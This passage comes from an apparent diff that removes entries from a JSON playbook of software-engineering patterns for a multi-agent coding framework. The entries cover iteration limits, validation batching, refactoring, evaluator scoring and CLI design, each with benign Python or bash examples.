\"\n f\"Last error: {last_feedback.error_message}\"\n )\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-20T23:37:01.153738Z", - "last_used_at": "2025-10-20T23:37:01.153739Z", - "related_bullets": [ - "arch-0001", - "impl-0002", - "test-0001" - ], - "tags": [ - "orchestrator", - "failure-threshold", - "circuit-breaker", - "intervention", - "retry-limit", - "map-framework", - "python", - "error-handling" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "arch-0006", - "content": "Iteration Threshold with Orchestrator Intervention: Implement maximum 2 iterations for Actor-Monitor feedback loops per subtask. After 2nd iteration failure, Orchestrator MUST intervene directly with full failure context instead of delegating back to Actor. This prevents infinite misinterpretation cycles where Actor repeatedly misunderstands Monitor feedback. Two iterations allow: (1st) initial attempt, (2nd) correction based on feedback. If 2nd fails, problem is systematic (ambiguous feedback, impossible requirement) requiring Orchestrator analysis. Pattern proven: subtask 2 format failure (iter 1) → arithmetic failure (iter 2) → Orchestrator direct fix succeeded immediately. 
Distinguishes from arch-0005 (same error 3x threshold) - this limits TOTAL iterations regardless of error type.", - "code_example": "```python\n# ✅ Two-Iteration Circuit Breaker with Orchestrator Intervention\nclass SubtaskExecutor:\n MAX_ITERATIONS = 2 # Hard limit per subtask\n \n def execute_with_monitoring(self, subtask):\n \"\"\"Execute subtask with max 2 Actor iterations, then Orchestrator intervention\"\"\"\n \n for iteration in range(1, self.MAX_ITERATIONS + 1):\n logger.info(f\"Subtask {subtask.id} iteration {iteration}/{self.MAX_ITERATIONS}\")\n \n result = actor.execute(subtask)\n feedback = monitor.evaluate(result)\n \n if feedback.passed:\n logger.info(f\"Subtask {subtask.id} passed on iteration {iteration}\")\n return result\n \n # Add feedback to context for next iteration\n subtask.add_feedback({\n \"iteration\": iteration,\n \"monitor_feedback\": feedback.message,\n \"gaps\": feedback.gaps\n })\n \n if iteration == self.MAX_ITERATIONS:\n # Reached iteration limit - Orchestrator intervenes\n logger.warning(\n f\"Subtask {subtask.id} failed after {self.MAX_ITERATIONS} iterations. 
\"\n f\"Orchestrator intervening directly.\"\n )\n return self._orchestrator_intervention(subtask, feedback)\n \n raise MaxIterationsError(f\"Subtask {subtask.id} exceeded {self.MAX_ITERATIONS} iterations\")\n \n def _orchestrator_intervention(self, subtask, last_feedback):\n \"\"\"Orchestrator fixes issue directly with full context\"\"\"\n # Orchestrator has full workflow context + all iteration history\n intervention_context = {\n \"subtask\": subtask,\n \"iteration_history\": subtask.feedback_history,\n \"last_monitor_feedback\": last_feedback,\n \"workflow_context\": self.workflow.get_accumulated_lessons()\n }\n \n # Orchestrator applies fix directly (not via Actor)\n fixed_result = orchestrator.apply_direct_fix(intervention_context)\n \n # Verify fix with Monitor\n verification = monitor.evaluate(fixed_result)\n if not verification.passed:\n raise OrchestrationError(\n f\"Orchestrator intervention failed for {subtask.id}. \"\n f\"Manual review required.\"\n )\n \n return fixed_result\n```", - "tags": [ - "orchestrator", - "iteration-limit", - "intervention", - "circuit-breaker", - "actor", - "monitor", - "feedback-loop", - "map-framework", - "python" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-21T10:08:01.014430Z", - "related_bullets": [ - "arch-0005", - "impl-0002", - "test-0001" - ] - }, - { - "id": "arch-0007", - "content": "Comprehensive Validation Pattern for Multi-Agent Workflows: When implementing validation agents (Monitor, Reviewer, Checker), use comprehensive validation with batched feedback instead of sequential validation with early exit. Run ALL independent validation checks in one pass (duplicates, schema, structure, logic), accumulate ALL issues, report them together. This prevents iteration explosion - with N independent issues, comprehensive validation requires 1 Actor-Validator cycle vs sequential validation requiring N cycles. 
Only use early exit when errors are truly dependent (syntax errors prevent semantic checks). Pattern proven: 4 duplicate issues fixed in 1 iteration with comprehensive validation vs 4 iterations with sequential validation.", - "code_example": "```python\n# ❌ SEQUENTIAL VALIDATION - iteration explosion\ndef validate_sequential(output):\n # Check duplicates first\n duplicates = find_duplicates(output)\n if duplicates:\n return ValidationError(f\"Found duplicates: {duplicates}\")\n \n # Never reaches other checks if duplicates exist\n schema_errors = validate_schema(output)\n if schema_errors:\n return ValidationError(f\"Schema errors: {schema_errors}\")\n \n return ValidationSuccess()\n# Result: 4 independent issues = 4 Actor-Monitor cycles\n\n# ✅ COMPREHENSIVE VALIDATION - batched feedback\ndef validate_comprehensive(output):\n issues = [] # Accumulate ALL issues\n \n # Run ALL independent checks\n duplicates = find_duplicates(output)\n if duplicates:\n issues.append(f\"Duplicates: {duplicates}\")\n \n schema_errors = validate_schema(output)\n if schema_errors:\n issues.append(f\"Schema errors: {schema_errors}\")\n \n structure_errors = validate_structure(output)\n if structure_errors:\n issues.append(f\"Structure errors: {structure_errors}\")\n \n logic_errors = validate_logic(output)\n if logic_errors:\n issues.append(f\"Logic errors: {logic_errors}\")\n \n # Report ALL issues together\n if issues:\n return ValidationError(\"\\n\".join(issues))\n \n return ValidationSuccess()\n# Result: 4 independent issues = 1 Actor-Monitor cycle\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-21T09:04:13.347892Z", - "last_used_at": "2025-10-21T09:04:13.348115Z", - "related_bullets": [ - "arch-0006", - "impl-0009" - ], - "tags": [ - "validation", - "comprehensive", - "batched-feedback", - "iteration-explosion", - "multi-agent", - "monitor", - "architecture", - "python", - "map-framework" - ], - "deprecated": false, - "deprecation_reason": null - }, - { 
- "id": "arch-0008", - "content": "Dependency-First Structural Refactoring: Before moving files or reorganizing packages, ALWAYS run comprehensive dependency analysis to distinguish code dependencies (high-risk, require implementation changes) from reference dependencies (low-risk, mechanical path updates). Code dependencies include imports, function calls, inheritance relationships. Reference dependencies include documentation links, configuration paths, test fixtures. Use grep/ripgrep to search for file/module names across codebase. Classify each match as code vs reference. Only proceed with file movement after mapping ALL dependencies and planning their updates. Moving files without dependency analysis causes cascading import failures and broken references requiring emergency rollback.", - "code_example": "```bash\n# ❌ DANGEROUS - Move files without dependency analysis\ngit mv src/old_location/module.py src/new_location/\n# Result: All imports break, tests fail, production risk\n\n# ✅ SAFE - Dependency analysis first\n# Step 1: Find ALL references to file being moved\nrg --type py 'from old_location import|import old_location' .\nrg --type md 'old_location' docs/\nrg 'old_location' config/ tests/\n\n# Step 2: Classify dependencies\n# CODE (high-risk): src/main.py:15 \"from old_location import module\"\n# REFERENCE (low-risk): docs/api.md:45 \"See old_location/module.py\"\n\n# Step 3: Plan updates\n# - Code deps: Update imports in 5 files (src/main.py, tests/test_*.py)\n# - Reference deps: Update 3 doc files, 1 config path\n\n# Step 4: Execute with verification\ngit mv src/old_location/module.py src/new_location/\n# Update code dependencies first (critical path)\n# Update reference dependencies second (documentation)\npytest # Verify no broken imports\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T13:32:16.485291Z", - "last_used_at": "2025-10-25T13:32:16.485301Z", - "related_bullets": [ - "arch-0002", - "impl-0008" - ], - "tags": [ 
- "refactoring", - "dependencies", - "file-movement", - "risk-mitigation", - "bash", - "grep", - "structural-change" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "arch-0009", - "content": "Agent Template Evolution Strategy: When enhancing agent templates with new fields/sections, insert new content between existing structural markers to preserve readability and maintain logical flow. Template structure order: Introduction → Core Instructions → Decision Frameworks → New Fields/Extensions → Examples → Checklist. Insert new fields AFTER closing tag but BEFORE opening tag. Rationale: Decision frameworks are conceptual foundation (theory), examples show full integration (practice), new fields bridge the gap (application). This placement allows examples to demonstrate new fields in context without requiring readers to scroll back to field definitions.", - "code_example": "```markdown\n# ❌ INCORRECT - New field appended at end (after examples)\n\n[Existing examples]\n\n\n### test_strategy ← Hard to integrate into examples\n[Field documentation]\n\n# ✅ CORRECT - New field between frameworks and examples\n ← Conceptual foundation ends\n\n### test_strategy ← Insert new capabilities here\n[Field documentation]\n**Test Layer Decision Table**: [Table]\n\n ← Full integration examples start\n[Examples now show test_strategy in context]\n\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-26T16:17:18.196289Z", - "last_used_at": null, - "related_to": [ - "arch-0004", - "doc-0020" - ], - "tags": [ - "agent-templates", - "architecture", - "backward-compatibility", - "template-design", - "maintainability" - ] - }, - { - "id": "arch-0010", - "content": "TaskDecomposer 3-Subtask Rule for Standalone Tools: When creating standalone tools/scripts/utilities (validators, generators, analyzers), decompose into 3 distinct subtasks: (1) Implementation (core logic, algorithms), (2) Testing (unit tests, edge cases), (3) Integration (CLI 
wiring, CI/CD hooks, documentation). Prevents 'built but not wired up' anti-pattern where excellent code achieves 9/10 quality but 4/10 completeness due to missing integration. Merged subtasks hide integration gaps until Predictor reveals 14+ files needing updates. Pattern proven: validate-dependencies.py scored 9/10 code quality but 4/10 completeness - implementation excellent, integration missing (CLI entry point, CI workflow integration, CONTRIBUTING.md documentation). Three-subtask decomposition surfaces integration requirements early, enables parallel Monitor validation (each subtask validates independently), reduces Predictor surprise (integration gaps discovered in planning, not execution).", - "code_example": "```python\n# ✅ GOOD - 3-Subtask Decomposition for Standalone Tool\n\n# Subtask 1: Implementation (validate-dependencies.py core logic)\nclass DependencyValidator:\n def validate_imports(self, file_path: str) -> ValidationResult:\n \"\"\"Core validation logic - no CLI, no integration\"\"\"\n imports = self.extract_imports(file_path)\n missing = self.check_against_pyproject(imports)\n return ValidationResult(missing_deps=missing)\n\n# Subtask 2: Testing (test_validate_dependencies.py)\ndef test_validator_detects_missing():\n \"\"\"Unit tests for core logic\"\"\"\n validator = DependencyValidator()\n result = validator.validate_imports('sample.py')\n assert 'pytest' in result.missing_deps\n\n# Subtask 3: Integration (wiring up tool)\n# A. CLI entry point (pyproject.toml)\n[project.scripts]\nvalidate-deps = \"mapify_cli.tools.validate_dependencies:main\"\n\n# B. CI/CD workflow (.github/workflows/validate.yml)\njobs:\n validate-dependencies:\n runs-on: ubuntu-latest\n steps:\n - run: python -m mapify_cli.tools.validate_dependencies\n\n# C. 
Documentation (CONTRIBUTING.md)\n## Dependency Validation\nRun `validate-deps` before committing to detect missing dependencies.\n\n# ❌ BAD - Merged Subtask (Implementation + Testing + Integration)\n# Result: 9/10 code quality (implementation works), 4/10 completeness\n# (CLI not wired, CI not updated, docs missing), 14 files needing updates\n# discovered only after Predictor analysis\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-27T07:32:38.306390Z", - "last_used_at": "2025-10-27T07:32:38.306390Z", - "related_bullets": [ - "arch-0002" - ], - "tags": [ - "taskdecomposer", - "subtask-planning", - "standalone-tools", - "integration", - "map-framework", - "completeness", - "python" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "arch-0011", - "content": "Monitor vs Predictor Division of Labor: Monitor validates implementation-level correctness (code quality, security, functionality within files), Predictor validates system-level integration (cross-file dependencies, CI/CD impact, documentation consistency, 10+ file ripple effects). Do NOT expect Monitor to catch integration gaps - that is Predictor's job. Pattern proven: validate-dependencies.py Monitor found 3 implementation issues (missing error handling, incorrect logic, security gaps), Predictor found 14 files needing updates (CLI integration, CI workflows, documentation). Both agents correctly fulfilled their roles. Monitor answers: 'Does this code work correctly in isolation?' Predictor answers: 'Does this change integrate correctly with the system?' Overlap causes inefficiency (both agents check same thing) or gaps (both assume other will check). Clear division enables parallel validation and reduces iteration loops. TERMINOLOGY: Monitor validates 'functionally_correct' (works as specified), Evaluator validates 'production_ready' (deployment-worthy). 
Monitor approval ≠ Evaluator approval - different quality dimensions.", - "code_example": "```python\n# ✅ CLEAR Division of Labor\n\nclass MonitorAgent:\n \"\"\"Implementation-level validation (single file, code correctness)\"\"\"\n def validate(self, actor_output):\n checks = [\n self.check_code_syntax(), # Does code compile?\n self.check_error_handling(), # Exceptions handled?\n self.check_security_patterns(), # SQL injection, XSS?\n self.check_code_quality(), # Complexity, naming?\n self.check_test_coverage(), # Tests exist?\n ]\n # ✅ Monitor FOUND: 3 issues in validate-dependencies.py logic\n # ✅ Monitor IGNORES: Whether tool is wired into CLI/CI\n return ValidationResult(issues=checks)\n\nclass PredictorAgent:\n \"\"\"System-level validation (cross-file, integration impact)\"\"\"\n def analyze_impact(self, actor_output):\n impacts = [\n self.find_callers(), # Which files call this?\n self.check_cli_integration(), # Entry point exists?\n self.check_ci_workflows(), # CI runs this tool?\n self.check_documentation(), # CONTRIBUTING.md updated?\n self.estimate_ripple_effects(), # How many files affected?\n ]\n # ✅ Predictor FOUND: 14 files need updates (integration gaps)\n # ✅ Predictor IGNORES: Whether code logic is correct\n return ImpactAnalysis(affected_files=impacts)\n\n# ❌ BAD - Monitor trying to do Predictor's job\nclass MonitorAgent:\n def validate(self, actor_output):\n # ... 
code quality checks ...\n self.check_cli_integration() # ❌ WRONG - this is Predictor's job\n # Result: Monitor rejects for missing CLI integration\n # But implementation might be correct!\n # Wastes iteration loop on wrong validation layer\n\n# Example from validate-dependencies.py:\n# Monitor: 3 implementation issues (logic, error handling) ✅\n# Predictor: 14 integration issues (CLI, CI, docs) ✅\n# Clear division prevented role confusion and parallel validation\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-27T07:32:38.306390Z", - "last_used_at": "2025-10-27T11:48:26.144410Z", - "related_bullets": [ - "arch-0001", - "arch-0002" - ], - "tags": [ - "monitor", - "predictor", - "validation", - "division-of-labor", - "implementation", - "integration", - "map-framework" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "arch-0012", - "content": "Evaluator Context-Dependent Threshold Logic: Do NOT use fixed approval threshold (e.g., >=8.0 approve, <8.0 reject). Distinguish decomposition issues (low completeness due to missing subtasks, integration gaps) vs implementation issues (bugs, security flaws, incorrect logic). For decomposition issues: PROCEED if correctness >=8.0 even if overall score is 7.0-8.0, because problem is in task planning (Orchestrator/TaskDecomposer), not Actor execution. For implementation issues: REJECT if correctness <8.0 regardless of overall score, because Actor must fix bugs before proceeding. Context-dependent thresholds prevent two failure modes: (1) Rejecting excellent implementations due to planning deficiencies (wastes Actor's work), (2) Approving buggy implementations because completeness is high (propagates defects). Pattern proven: validate-dependencies.py scored 7.85/10 overall (9.0/10 correctness, 4.0/10 completeness) → PROCEED decision correct because 14 missing files are decomposition issue, not implementation defect. 
Fixed threshold would have rejected 9/10 quality code.", - "code_example": "```python\n# ✅ GOOD - Context-Dependent Evaluator Logic\n\nclass EvaluatorAgent:\n CORRECTNESS_THRESHOLD = 8.0 # Implementation quality gate\n OVERALL_THRESHOLD = 8.0 # Ideal target\n \n def evaluate(self, actor_output, monitor_feedback, predictor_impact):\n scores = self.calculate_scores(actor_output)\n \n # Identify issue type\n issue_type = self.classify_issue(scores, predictor_impact)\n \n if issue_type == \"DECOMPOSITION\":\n # Low completeness due to missing subtasks/integration\n # This is Orchestrator/TaskDecomposer issue, not Actor fault\n if scores.correctness >= self.CORRECTNESS_THRESHOLD:\n return Decision(\n approved=True,\n reason=f\"PROCEED: Correctness {scores.correctness}/10 meets threshold despite overall {scores.overall}/10. Completeness gap ({scores.completeness}/10) is decomposition issue - Actor implemented assigned scope correctly. Predictor identified {predictor_impact.affected_files_count} files needing updates, indicating subtask should have been split (Implementation + Integration).\"\n )\n \n elif issue_type == \"IMPLEMENTATION\":\n # Bugs, security flaws, incorrect logic\n # Actor must fix before proceeding\n if scores.correctness < self.CORRECTNESS_THRESHOLD:\n return Decision(\n approved=False,\n reason=f\"REJECT: Correctness {scores.correctness}/10 below threshold. Implementation has bugs/security issues that Actor must fix. 
Completeness ({scores.completeness}/10) is irrelevant until code correctness is achieved.\"\n )\n \n # Happy path: both correctness and overall meet threshold\n if scores.overall >= self.OVERALL_THRESHOLD:\n return Decision(approved=True, reason=\"All metrics meet thresholds\")\n \n def classify_issue(self, scores, predictor_impact):\n \"\"\"Distinguish decomposition vs implementation issues\"\"\"\n # Decomposition issue signals:\n # - High correctness (>=8.0) but low completeness (<6.0)\n # - Predictor found 10+ files needing updates (integration gaps)\n # - Monitor found few/no implementation defects\n if (scores.correctness >= 8.0 and \n scores.completeness < 6.0 and \n predictor_impact.affected_files_count >= 10):\n return \"DECOMPOSITION\"\n \n # Implementation issue signals:\n # - Low correctness (<8.0)\n # - Monitor found bugs, security issues, logic errors\n if scores.correctness < 8.0:\n return \"IMPLEMENTATION\"\n \n return \"UNKNOWN\"\n\n# ❌ BAD - Fixed Threshold (ignores context)\nif overall_score < 8.0:\n return Decision(approved=False) # Rejects 7.85 score\n# Result: Excellent 9/10 implementation rejected due to planning deficiency\n# Actor must redo work that was already correct\n\n# Real Example: validate-dependencies.py\n# Overall: 7.85/10 (below fixed 8.0 threshold)\n# Correctness: 9.0/10 (excellent implementation)\n# Completeness: 4.0/10 (missing 14 integration files)\n# Fixed threshold: REJECT ❌ (wastes Actor's correct work)\n# Context-aware: PROCEED ✅ (recognizes decomposition issue)\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-27T07:32:38.306390Z", - "last_used_at": "2025-10-27T07:32:38.306390Z", - "related_bullets": [ - "arch-0001" - ], - "tags": [ - "evaluator", - "threshold", - "approval-logic", - "context-dependent", - "decomposition", - "correctness", - "completeness", - "map-framework" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "arch-0013", - "content": "Context-Dependent 
Completeness Scoring in Evaluator: Only penalize missing elements that fall WITHIN current subtask's scope. If element is explicitly handled by different subtask (e.g., documentation in Subtask 7, integration in Subtask 8), do NOT penalize completeness in current subtask. Respects MAP decomposition strategy where workflow intentionally splits concerns across subtasks. Pattern proven: Subtask 6 missing documentation → correct score 9/10 completeness (not 4/10) because Subtask 7 explicitly handles docs. Prevents 'penalize Actor for Orchestrator's decomposition decisions' anti-pattern. Evaluator must examine full task plan to determine scope boundaries: if task plan shows 'Subtask 6: Implementation, Subtask 7: Documentation', then Subtask 6 gets zero documentation penalty. Cross-subtask dependencies are Orchestrator's responsibility, not Actor's failure. This pattern distinguishes from arch-0012 (decomposition vs implementation issues) - arch-0012 focuses on correctness threshold logic, this pattern focuses on completeness scoring boundaries.", - "code_example": "```python\n# ✅ GOOD - Context-Aware Completeness\nclass EvaluatorAgent:\n def calculate_completeness(self, actor_output, subtask, task_plan):\n delegated = task_plan.get_future_responsibilities()\n missing_in_scope = [\n el for el in self.REQUIRED \n if el not in actor_output and el not in delegated\n ]\n return 10 - len(missing_in_scope)\n\n# Example: Subtask 6 missing docs\n# docs in Subtask 7 → completeness=9/10 (not 4/10)\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-27T11:48:26.144410Z", - "last_used_at": "2025-10-27T11:48:26.144410Z", - "related_bullets": [ - "arch-0012", - "arch-0002", - "arch-0010" - ], - "tags": [ - "Evaluator", - "completeness", - "scoring", - "subtask-scope", - "decomposition", - "MAP" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "arch-0014", - "content": "Typer Sub-App Integration Pattern for CLI Tools: When adding new CLI 
commands to existing Typer application, use lazy-import sub-app pattern to isolate functionality and improve startup performance. Pattern: (1) Create dedicated sub-app in module (app = typer.Typer()), (2) Define commands on sub-app (@app.command()), (3) Import sub-app lazily in main CLI module, (4) Register with main app (main_app.add_typer(sub_app, name='command-group')). Benefits: 9/10 architectural fit (proven in recitation_app, playbook_app, validate_app), command isolation (dependencies loaded only when invoked), consistent CLI structure (grouped commands), independent testing (mock sub-app without main CLI). Avoid tight coupling: sub-app imports should not depend on main app internals.", - "code_example": "```python\n# ❌ BAD - Direct command registration (tight coupling)\n# main.py\nfrom mapify_cli import app # Main Typer app\nfrom mapify_cli.tools.validate_dependencies import validate_imports\n\n@app.command('validate-deps')\ndef validate_deps_cmd(file: str):\n \"\"\"Tightly coupled to main app\"\"\"\n result = validate_imports(file)\n print(result)\n# Problem: All tool imports loaded at CLI startup, no isolation\n\n# ✅ GOOD - Sub-App Pattern (isolation + lazy import)\n# mapify_cli/tools/validate_app.py\nimport typer\nfrom mapify_cli.tools.validate_dependencies import DependencyValidator\n\napp = typer.Typer(help=\"Dependency validation tools\")\n\n@app.command('validate-deps')\ndef validate_deps(\n file: str = typer.Argument(..., help=\"Python file to validate\")\n):\n \"\"\"Validate imports against pyproject.toml\"\"\"\n validator = DependencyValidator()\n result = validator.validate_imports(file)\n if result.missing_deps:\n print(f\"Missing dependencies: {result.missing_deps}\")\n raise typer.Exit(code=1)\n print(\"All dependencies satisfied\")\n\n# mapify_cli/main.py (main CLI app)\nimport typer\n\napp = typer.Typer()\n\n# Lazy import sub-app only when validate command invoked\ntry:\n from mapify_cli.tools import validate_app\n 
app.add_typer(validate_app.app, name='validate')\nexcept ImportError:\n pass # Graceful degradation if tools not installed\n\nif __name__ == '__main__':\n app()\n\n# Result: Users run 'mapify validate validate-deps file.py'\n# Benefits: Isolation (validate_app testable independently),\n# Performance (lazy import), Consistency (follows recitation_app pattern)\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-27T11:14:58.063144+00:00", - "last_used_at": "2025-10-27T11:14:58.063144+00:00", - "related_bullets": [ - "arch-0010", - "impl-0008" - ], - "tags": [ - "typer", - "cli", - "sub-app", - "architecture", - "lazy-import", - "isolation", - "python", - "performance" - ], - "deprecated": false, - "deprecation_reason": null - } - ] - }, - "IMPLEMENTATION_PATTERNS": { - "description": "Code patterns and idioms for common development tasks", - "bullets": [ - { - "id": "impl-0001", - "content": "Multi-Agent Workflow Documentation: When documenting analysis findings in multi-agent systems, always include detailed implementation plans with concrete before/after examples, not just abstract findings. Monitors/Evaluators need actionable plans to verify completion. Structure: (1) Current state with file paths and line numbers, (2) Proposed changes with specific code modifications, (3) Verification criteria. 
This prevents 'findings without fixes' anti-pattern common in AI-assisted workflows.", - "code_example": "```python\n# ❌ INSUFFICIENT - Just findings\nanalysis = {\n \"findings\": [\"Workflow logging incomplete\"],\n \"recommendation\": \"Add logging\"\n}\n\n# ✅ ACTIONABLE - Implementation plan\nanalysis = {\n \"findings\": [\"Workflow logging incomplete in orchestrator.py:45-67\"],\n \"implementation_plan\": {\n \"before\": \"# No logging in execute_subtask()\\nresult = actor.execute(task)\",\n \"after\": \"logger.info(f'Executing subtask {task.id}')\\nresult = actor.execute(task)\\nlogger.info(f'Completed subtask {task.id}')\",\n \"files\": [\"src/orchestrator.py\"],\n \"verification\": \"Check logs contain 'Executing subtask' and 'Completed subtask' entries\"\n }\n}\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-18T12:26:06.880415Z", - "last_used_at": "2025-10-18T12:26:06.880415Z", - "related_bullets": [], - "tags": [ - "multi-agent", - "workflow", - "documentation", - "python", - "map-framework", - "implementation-plan" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0002", - "content": "Inter-Subtask Learning Propagation: When workflow executes similar sequential subtasks (e.g., Subtask 1 analysis, Subtask 2 analysis), extract Monitor feedback from first subtask as preventive checklist for subsequent subtasks. This reduces iteration count by preemptively addressing common gaps. Extract task-type-specific lessons (e.g., 'analysis must include implementation plan'), not implementation-specific fixes (e.g., 'add logging to orchestrator.py line 45'). 
Pattern proven: Subtask 1 required 2 iterations to pass Monitor, Subtask 2 required only 1 iteration when checklist applied.", - "code_example": "```python\n# ❌ WITHOUT Learning Propagation\ndef execute_sequential_subtasks(subtasks):\n for subtask in subtasks:\n result = actor.execute(subtask) # Each subtask repeats same mistakes\n feedback = monitor.evaluate(result)\n # No cross-subtask learning\n\n# ✅ WITH Learning Propagation\ndef execute_sequential_subtasks(subtasks):\n workflow_lessons = [] # Accumulate lessons\n \n for i, subtask in enumerate(subtasks):\n # Apply lessons from previous similar subtasks\n if workflow_lessons:\n subtask.context['preventive_checklist'] = workflow_lessons\n \n result = actor.execute(subtask)\n feedback = monitor.evaluate(result)\n \n # Extract reusable lessons (not implementation-specific)\n if feedback.gaps:\n lesson = extract_pattern(feedback.gaps) # e.g., 'include implementation plan'\n workflow_lessons.append(lesson)\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-18T15:42:00.000000Z", - "last_used_at": "2025-10-18T15:42:00.000000Z", - "related_bullets": [ - "test-0001", - "impl-0001" - ], - "tags": [ - "multi-agent", - "workflow", - "learning", - "iteration-reduction", - "map-framework", - "python", - "feedback-propagation" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0003", - "content": "Executable Specification for Code Transformations: When analyzing code requiring mechanical transformations (refactoring, optimization, style fixes), provide executable specifications with exact line ranges and verbatim current/optimized text. Structure: (1) File path + exact line range (e.g., lines 45-67), (2) Current text verbatim from those lines, (3) Optimized text showing exact replacement, (4) Transformation rule applied. This eliminates interpretation ambiguity between analyst and implementer. Vague analysis ('improve error handling') causes iteration loops. 
Detailed specification enables single-iteration implementation. Proven: Subtask 1 with detailed spec → Subtask 3 implemented in 1 iteration.", - "code_example": "```python\n# ❌ VAGUE - Causes iterations\nanalysis = {\n \"finding\": \"Error handling in parser.py needs improvement\",\n \"recommendation\": \"Add try-catch blocks\"\n}\n\n# ✅ EXECUTABLE SPECIFICATION - Single iteration\nanalysis = {\n \"file\": \"/absolute/path/parser.py\",\n \"line_range\": \"45-52\",\n \"current_text\": \"\"\"def parse_config(file_path):\n data = json.load(open(file_path))\n return Config(data)\"\"\",\n \"optimized_text\": \"\"\"def parse_config(file_path):\n try:\n with open(file_path) as f:\n data = json.load(f)\n return Config(data)\n except (FileNotFoundError, json.JSONDecodeError) as e:\n logger.error(f'Config parse failed: {e}')\n raise ConfigError(f'Invalid config {file_path}') from e\"\"\",\n \"transformation_rule\": \"Add context manager for file handling + explicit exception handling with logging\"\n}\n```", - "helpful_count": 1, - "harmful_count": 0, - "created_at": "2025-10-18T16:05:00.000000Z", - "last_used_at": "2025-10-18T18:00:00.000000Z", - "related_bullets": [ - "impl-0001", - "qual-0001" - ], - "tags": [ - "transformation", - "specification", - "refactoring", - "analysis", - "implementation-plan", - "map-framework", - "python", - "code-quality" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0004", - "content": "Bounded Optimization Specifications: When specifying optimization targets (e.g., token compression), define BOTH target floor (minimum acceptable) AND ceiling (maximum safe compression). Structure: (1) Target floor with rationale (e.g., '50% compression' based on efficiency goals), (2) Ceiling as % over target (e.g., '100-150% over target' = safe zone, '>200% over' = danger zone where over-optimization risks quality). 
Distinguish template purposes: teaching templates (require concrete code examples) need stricter ceilings (~150%) to preserve pedagogical value, validation templates (allow summaries) permit looser ceilings (~200%) for efficiency. Safe optimization zone: 100-150% over target. Danger zone: >200% where compression compromises content value.", - "code_example": "```python\n# ❌ UNBOUNDED - Risks over-optimization\noptimization_spec = {\n \"target\": \"Reduce tokens by 50%\",\n \"approach\": \"Remove unnecessary verbosity\"\n}\n# Result: Unconstrained optimization may remove critical details\n\n# ✅ BOUNDED - Safe optimization corridor\noptimization_spec = {\n \"target_floor\": \"50% token reduction (efficiency goal)\",\n \"ceiling\": \"150% over target = 75% max reduction\",\n \"safe_zone\": \"50-75% reduction acceptable\",\n \"danger_zone\": \">75% reduction risks content loss\",\n \"template_purpose\": \"teaching\", # vs 'validation'\n \"purpose_constraints\": {\n \"teaching\": \"Preserve concrete code examples, max 150% ceiling\",\n \"validation\": \"Summaries acceptable, max 200% ceiling\"\n },\n \"rationale\": \"Teaching templates need pedagogical completeness, validation templates optimize for efficiency\"\n}\n\n# Evidence-based thresholds from workflow:\n# - Monitor template 135% praised (validation purpose, within safe zone)\n# - Evaluator template 238% concerns (teaching purpose, exceeded safe ceiling)\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-18T18:00:00.000000Z", - "last_used_at": "2025-10-18T18:00:00.000000Z", - "related_bullets": [ - "impl-0003", - "qual-0001" - ], - "tags": [ - "optimization", - "specification", - "bounded", - "compression", - "template", - "map-framework", - "python", - "quality-gate" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0005", - "content": "File Synchronization with Cryptographic Verification: When verifying file equivalence across directories (template sync, 
config propagation, backup validation), always use SHA256 or stronger cryptographic hashes. Hash-based verification provides mathematical certainty superior to manual diff inspection (error-prone), timestamp comparison (git resets timestamps), or file size checks (can coincidentally match). Generate hash manifests for both source and target directories, then compare manifests. This approach is automation-friendly, scriptable, and provides binary identical/different decisions. Always perform complete discovery before modification: identify missing files, divergent files, AND orphaned artifacts in a single pass, then apply fixes as an atomic batch.", - "code_example": "```bash\n# ❌ INCORRECT - manual diff (error-prone, doesn't scale)\nfor f in *.md; do diff source/$f target/$f; done\n\n# ❌ INCORRECT - timestamp comparison (unreliable with git)\nfind source/ -newer target/\n\n# ✅ CORRECT - SHA256 hash comparison\n(cd source && shasum -a 256 *.md) | sort > source_hashes.txt\n(cd target && shasum -a 256 *.md) | sort > target_hashes.txt\ndiff source_hashes.txt target_hashes.txt\n\n# ✅ CORRECT - Complete discovery\ncomm -23 <(cd source && ls | sort) <(cd target && ls | sort) # Missing\ncomm -13 <(cd source && ls | sort) <(cd target && ls | sort) # Orphaned\n\n# Apply fixes, then re-verify with hashes\ncp source/missing.md target/\n(cd target && shasum -a 256 *.md) | diff source_hashes.txt -\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-20T10:00:56.751820Z", - "last_used_at": "2025-10-20T10:00:56.751828Z", - "related_bullets": [ - "impl-0003" - ], - "tags": [ - "file-sync", - "cryptographic-hash", - "sha256", - "verification", - "template", - "devops", - "bash", - "infrastructure" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0006", - "content": "Behavior Matrix Documentation: When documenting system behavior across multiple states, create markdown tables showing State × Operation → Outcome. 
